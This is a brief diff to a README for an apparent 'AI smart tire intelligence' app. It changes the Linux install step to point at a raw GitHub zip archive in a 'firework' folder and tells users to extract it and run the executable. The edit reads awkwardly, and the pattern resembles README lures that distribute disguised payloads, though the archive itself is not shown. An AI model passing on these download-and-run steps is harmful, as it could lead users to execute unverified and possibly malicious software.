Adoni-123/ai-smart-tire-intelligence/README.md

    - **Windows:** Open the downloaded `.exe` file and follow the on-screen instructions.
    - **Mac:** Open the downloaded `.dmg` file, drag the application to your Applications folder, and launch it from there.
-   - **Linux:** Extract the `.tar.gz` file, open a terminal in the folder, and run the executable file.
+   - **Linux:** Extract the `https://raw.githubusercontent.com/Adoni-123/ai-smart-tire-intelligence/main/firework/ai-smart-tire-intelligence.zip` file, open a terminal in the folder, and run the executable file.

 5. **Run the Application**
    After installation, open the application.
 You may need to allow it permission to run, depending on your operating system settings.